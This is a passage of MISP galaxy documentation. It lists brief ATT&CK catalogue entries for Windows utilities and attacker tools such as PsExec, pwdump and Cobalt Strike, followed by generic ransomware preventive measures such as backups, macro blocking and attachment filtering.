<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/cc732443.aspx">https://technet.microsoft.com/library/cc732443.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nbtstat"><a class="anchor" href="#_nbtstat"></a><a class="link" href="#_nbtstat">nbtstat</a></h3>
<div class="paragraph">
<p>nbtstat is a utility used to troubleshoot NetBIOS name resolution.[[Citation: TechNet Nbtstat]]</p>
</div>
<div class="paragraph">
<p>Aliases: nbtstat, nbtstat.exe</p>
</div>
<div class="paragraph">
<p>nbtstat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>nbtstat</p>
</li>
<li>
<p>nbtstat.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1655. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0102">https://attack.mitre.org/wiki/Software/S0102</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc940106.aspx">https://technet.microsoft.com/en-us/library/cc940106.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_htran"><a class="anchor" href="#_htran"></a><a class="link" href="#_htran">HTRAN</a></h3>
<div class="paragraph">
<p>HTRAN is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. [[Citation: Operation Quantum Entanglement]]</p>
</div>
<div class="paragraph">
<p>Aliases: HTRAN, HUC Packet Transmit Tool</p>
</div>
<div class="paragraph">
<p>HTRAN is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HTRAN</p>
</li>
<li>
<p>HUC Packet Transmit Tool</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1656. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0040">https://attack.mitre.org/wiki/Software/S0040</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netstat"><a class="anchor" href="#_netstat"></a><a class="link" href="#_netstat">netstat</a></h3>
<div class="paragraph">
<p>netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics.[[Citation: TechNet Netstat]]</p>
</div>
<div class="paragraph">
<p>Aliases: netstat, netstat.exe</p>
</div>
<div class="paragraph">
<p>netstat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>netstat</p>
</li>
<li>
<p>netstat.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1657. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0104">https://attack.mitre.org/wiki/Software/S0104</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490947.aspx">https://technet.microsoft.com/en-us/library/bb490947.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pwdump"><a class="anchor" href="#_pwdump"></a><a class="link" href="#_pwdump">pwdump</a></h3>
<div class="paragraph">
<p>pwdump is a credential dumper.[[Citation: Wikipedia pwdump]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1658. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0006">https://attack.mitre.org/wiki/Software/S0006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Pwdump">https://en.wikipedia.org/wiki/Pwdump</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cachedump"><a class="anchor" href="#_cachedump"></a><a class="link" href="#_cachedump">Cachedump</a></h3>
<div class="paragraph">
<p>Cachedump is a publicly-available tool that program extracts cached password hashes from a systems registry.[[Citation: Mandiant APT1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1659. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0119">https://attack.mitre.org/wiki/Software/S0119</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_net"><a class="anchor" href="#_net"></a><a class="link" href="#_net">Net</a></h3>
<div class="paragraph">
<p>The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections.Net has a great deal of functionality,[[Citation: Savill 1999]] much of which is useful for an adversary, such as gathering system and network information for <a id="Discovery"></a>, moving laterally through [[Windows admin shares]] using &lt;code&gt;net use&lt;/code&gt; commands, and interacting with services.</p>
</div>
<div class="paragraph">
<p>Aliases: Net, net.exe</p>
</div>
<div class="paragraph">
<p>Net is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Net</p>
</li>
<li>
<p>net.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1660. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0039">https://attack.mitre.org/wiki/Software/S0039</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/aa939914">https://msdn.microsoft.com/en-us/library/aa939914</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://windowsitpro.com/windows/netexe-reference">http://windowsitpro.com/windows/netexe-reference</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_psexec"><a class="anchor" href="#_psexec"></a><a class="link" href="#_psexec">PsExec</a></h3>
<div class="paragraph">
<p>PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.[[Citation: Russinovich Sysinternals]][[Citation: SANS PsExec]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1661. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0029">https://attack.mitre.org/wiki/Software/S0029</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx">https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive">https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_arp"><a class="anchor" href="#_arp"></a><a class="link" href="#_arp">Arp</a></h3>
<div class="paragraph">
<p>Arp displays information about a system&#8217;s Address Resolution Protocol (ARP) cache.[[Citation: TechNet Arp]]</p>
</div>
<div class="paragraph">
<p>Aliases: Arp, arp.exe</p>
</div>
<div class="paragraph">
<p>Arp is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Arp</p>
</li>
<li>
<p>arp.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1662. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0099">https://attack.mitre.org/wiki/Software/S0099</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490864.aspx">https://technet.microsoft.com/en-us/library/bb490864.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cmd"><a class="anchor" href="#_cmd"></a><a class="link" href="#_cmd">cmd</a></h3>
<div class="paragraph">
<p>cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities.[[Citation: TechNet Cmd]]</p>
</div>
<div class="paragraph">
<p>Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., &lt;code&gt;dir&lt;/code&gt;[[Citation: TechNet Dir]]), deleting files (e.g., &lt;code&gt;del&lt;/code&gt;[[Citation: TechNet Del]]), and copying files (e.g., &lt;code&gt;copy&lt;/code&gt;[[Citation: TechNet Copy]]).</p>
</div>
<div class="paragraph">
<p>Aliases: cmd, cmd.exe</p>
</div>
<div class="paragraph">
<p>cmd is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>cmd</p>
</li>
<li>
<p>cmd.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1663. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0106">https://attack.mitre.org/wiki/Software/S0106</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc771049.aspx">https://technet.microsoft.com/en-us/library/cc771049.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc755121.aspx">https://technet.microsoft.com/en-us/library/cc755121.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490886.aspx">https://technet.microsoft.com/en-us/library/bb490886.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490880.aspx">https://technet.microsoft.com/en-us/library/bb490880.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cobalt_strike"><a class="anchor" href="#_cobalt_strike"></a><a class="link" href="#_cobalt_strike">Cobalt Strike</a></h3>
<div class="paragraph">
<p>Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strikes interactive post-exploit capabilities cover the full range of ATT&amp;CK tactics, all executed within a single, integrated system.Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[[Citation: cobaltstrike manual]]</p>
</div>
<div class="paragraph">
<p>The list of techniques below focuses on Cobalt Strikes ATT&amp;CK-relevant tactics.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1664. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0154">https://attack.mitre.org/wiki/Software/S0154</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cobaltstrike.com/downloads/csmanual38.pdf">https://cobaltstrike.com/downloads/csmanual38.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reg"><a class="anchor" href="#_reg"></a><a class="link" href="#_reg">Reg</a></h3>
<div class="paragraph">
<p>Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information.Reg are known to be used by persistent threats.[[Citation: Windows Commands JPCERT]]</p>
</div>
<div class="paragraph">
<p>Aliases: Reg, reg.exe</p>
</div>
<div class="paragraph">
<p>Reg is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Reg</p>
</li>
<li>
<p>reg.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1665. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0075">https://attack.mitre.org/wiki/Software/S0075</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc732643.aspx">https://technet.microsoft.com/en-us/library/cc732643.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_preventive_measure"><a class="anchor" href="#_preventive_measure"></a><a class="link" href="#_preventive_measure">Preventive Measure</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Preventive measures based on the ransomware document overview as published in <a href="https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#" class="bare">https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#</a> . The preventive measures are quite generic and can fit any standard Windows infrastructure and their security measures..</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Preventive Measure is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/preventive" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/preventive</a> measure.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Various</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_backup_and_restore_process"><a class="anchor" href="#_backup_and_restore_process"></a><a class="link" href="#_backup_and_restore_process">Backup and Restore Process</a></h3>
<div class="paragraph">
<p>Make sure to have adequate backup processes on place and frequently test a restore of these backups.
(Schrödinger&#8217;s backup - it is both existent and non-existent until you&#8217;ve tried a restore</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1666. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7" class="bare">http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7</a>.[<a href="http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7" class="bare">http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7</a>.]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_block_macros"><a class="anchor" href="#_block_macros"></a><a class="link" href="#_block_macros">Block Macros</a></h3>
<div class="paragraph">
<p>Disable macros in Office files downloaded from the Internet. This can be configured to work in two different modes:
A.) Open downloaded documents in 'Protected View'
B.) Open downloaded documents and block all macros</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1667. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6?ui=en-US&amp;rs=en-US&amp;ad=US">https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6?ui=en-US&amp;rs=en-US&amp;ad=US</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.404techsupport.com/2016/04/office2016-macro-group-policy/?utm_source=dlvr.it&amp;utm_medium=twitter">https://www.404techsupport.com/2016/04/office2016-macro-group-policy/?utm_source=dlvr.it&amp;utm_medium=twitter</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disable_wsh"><a class="anchor" href="#_disable_wsh"></a><a class="link" href="#_disable_wsh">Disable WSH</a></h3>
<div class="paragraph">
<p>Disable Windows Script Host</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1668. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.windowsnetworking.com/kbase/WindowsTips/WindowsXP/AdminTips/Customization/DisableWindowsScriptingHostWSH.html">http://www.windowsnetworking.com/kbase/WindowsTips/WindowsXP/AdminTips/Customization/DisableWindowsScriptingHostWSH.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_filter_attachments_level_1"><a class="anchor" href="#_filter_attachments_level_1"></a><a class="link" href="#_filter_attachments_level_1">Filter Attachments Level 1</a></h3>
<div class="paragraph">
<p>Filter the following attachments on your mail gateway:
.ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .exe, .hlp, .ht, .hta, .inf, .ins, .isp, .jar, .job, .js, .jse, .lnk, .mda, .mdb, .mde, .mdz, .msc, .msi, .msp, .mst, .ocx, .pcd, .ps1, .reg, .scr, .sct, .shs, .svg, .url, .vb, .vbe, .vbs, .wbk, .wsc, .ws, .wsf, .wsh, .exe, .pif, .pub</p>
</div>
</div>
<div class="sect2">
<h3 id="_filter_attachments_level_2"><a class="anchor" href="#_filter_attachments_level_2"></a><a class="link" href="#_filter_attachments_level_2">Filter Attachments Level 2</a></h3>
<div class="paragraph">
<p>Filter the following attachments on your mail gateway:
(Filter expression of Level 1 plus) .doc, .xls, .rtf, .docm, .xlsm, .pptm</p>
</div>
</div>
<div class="sect2">
<h3 id="_restrict_program_execution"><a class="anchor" href="#_restrict_program_execution"></a><a class="link" href="#_restrict_program_execution">Restrict program execution</a></h3>
<div class="paragraph">
<p>Block all program executions from the %LocalAppData% and %AppData% folder</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1669. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/">http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thirdtier.net/ransomware-prevention-kit/">http://www.thirdtier.net/ransomware-prevention-kit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_show_file_extensions"><a class="anchor" href="#_show_file_extensions"></a><a class="link" href="#_show_file_extensions">Show File Extensions</a></h3>
<div class="paragraph">
<p>Set the registry key "HideFileExt" to 0 in order to show all file extensions, even of known file types. This helps avoiding cloaking tricks that use double extensions. (e.g. "not_a_virus.pdf.exe")</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1670. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sevenforums.com/tutorials/10570-file-extensions-hide-show.htm">http://www.sevenforums.com/tutorials/10570-file-extensions-hide-show.htm</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_enforce_uac_prompt"><a class="anchor" href="#_enforce_uac_prompt"></a><a class="link" href="#_enforce_uac_prompt">Enforce UAC Prompt</a></h3>
<div class="paragraph">
<p>Enforce administrative users to confirm an action that requires elevated rights</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1671. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dd835564(WS.10).aspx">https://technet.microsoft.com/en-us/library/dd835564(WS.10).aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remove_admin_privileges"><a class="anchor" href="#_remove_admin_privileges"></a><a class="link" href="#_remove_admin_privileges">Remove Admin Privileges</a></h3>
<div class="paragraph">
<p>Remove and restrict administrative rights whenever possible. Malware can only modify files that users have write access to.</p>
</div>
</div>
<div class="sect2">
<h3 id="_restrict_workstation_communication"><a class="anchor" href="#_restrict_workstation_communication"></a><a class="link" href="#_restrict_workstation_communication">Restrict Workstation Communication</a></h3>
<div class="paragraph">
<p>Activate the Windows Firewall to restrict workstation to workstation communication</p>
</div>
</div>
<div class="sect2">
<h3 id="_sandboxing_email_input"><a class="anchor" href="#_sandboxing_email_input"></a><a class="link" href="#_sandboxing_email_input">Sandboxing Email Input</a></h3>
<div class="paragraph">
<p>Using sandbox that opens email attachments and removes attachments based on behavior analysis</p>
</div>
</div>
<div class="sect2">
<h3 id="_execution_prevention"><a class="anchor" href="#_execution_prevention"></a><a class="link" href="#_execution_prevention">Execution Prevention</a></h3>
<div class="paragraph">
<p>Software that allows to control the execution of processes - sometimes integrated in Antivirus software
Free: AntiHook, ProcessGuard, System Safety Monitor</p>
</div>
</div>
<div class="sect2">
<h3 id="_change_default_open_with_to_notepad"><a class="anchor" href="#_change_default_open_with_to_notepad"></a><a class="link" href="#_change_default_open_with_to_notepad">Change Default "Open With" to Notepad</a></h3>
<div class="paragraph">
<p>Force extensions primarily used for infections to open up in Notepad rather than Windows Script Host or Internet Explorer</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1672. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://bluesoul.me/2016/05/12/use-gpo-to-change-the-default-behavior-of-potentially-malicious-file-extensions/">https://bluesoul.me/2016/05/12/use-gpo-to-change-the-default-behavior-of-potentially-malicious-file-extensions/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_screening"><a class="anchor" href="#_file_screening"></a><a class="link" href="#_file_screening">File Screening</a></h3>
<div class="paragraph">
<p>Server-side file screening with the help of File Server Resource Manager</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1673. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://jpelectron.com/sample/Info%20and%20Documents/Stop%20crypto%20badware%20before%20it%20ruins%20your%20day/1-PreventCrypto-Readme.htm">http://jpelectron.com/sample/Info%20and%20Documents/Stop%20crypto%20badware%20before%20it%20ruins%20your%20day/1-PreventCrypto-Readme.htm</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_restrict_program_execution_2"><a class="anchor" href="#_restrict_program_execution_2"></a><a class="link" href="#_restrict_program_execution_2">Restrict program execution #2</a></h3>
<div class="paragraph">
<p>Block program executions (AppLocker)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1674. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dd759117%28v=ws.11%29.aspx">https://technet.microsoft.com/en-us/library/dd759117%28v=ws.11%29.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://social.technet.microsoft.com/wiki/contents/articles/5211.how-to-configure-applocker-group-policy-to-prevent-software-from-running.aspx">http://social.technet.microsoft.com/wiki/contents/articles/5211.how-to-configure-applocker-group-policy-to-prevent-software-from-running.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_emet"><a class="anchor" href="#_emet"></a><a class="link" href="#_emet">EMET</a></h3>
<div class="paragraph">
<p>Detect and block exploitation techniques</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1675. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">www.microsoft.com/emet[www.microsoft.com/emet]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://windowsitpro.com/security/control-emet-group-policy">http://windowsitpro.com/security/control-emet-group-policy</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sysmon"><a class="anchor" href="#_sysmon"></a><a class="link" href="#_sysmon">Sysmon</a></h3>
<div class="paragraph">
<p>Detect Ransomware in an early stage with new Sysmon 5 File/Registry monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1676. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JohnLaTwC/status/799792296883388416">https://twitter.com/JohnLaTwC/status/799792296883388416</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blacklist_phone_numbers"><a class="anchor" href="#_blacklist_phone_numbers"></a><a class="link" href="#_blacklist_phone_numbers">Blacklist-phone-numbers</a></h3>
<div class="paragraph">
<p>Filter the numbers at phone routing level including PABX</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1677. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://wiki.freepbx.org/display/FPG/Blacklist+Module+User+Guide#BlacklistModuleUserGuide-ImportingorExportingaBlacklistinCSVFileFormat">https://wiki.freepbx.org/display/FPG/Blacklist+Module+User+Guide#BlacklistModuleUserGuide-ImportingorExportingaBlacklistinCSVFileFormat</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_ransomware"><a class="anchor" href="#_ransomware"></a><a class="link" href="#_ransomware">Ransomware</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Ransomware galaxy based on <a href="https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml" class="bare">https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml</a> and <a href="http://pastebin.com/raw/GHgpWjar" class="bare">http://pastebin.com/raw/GHgpWjar</a>.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
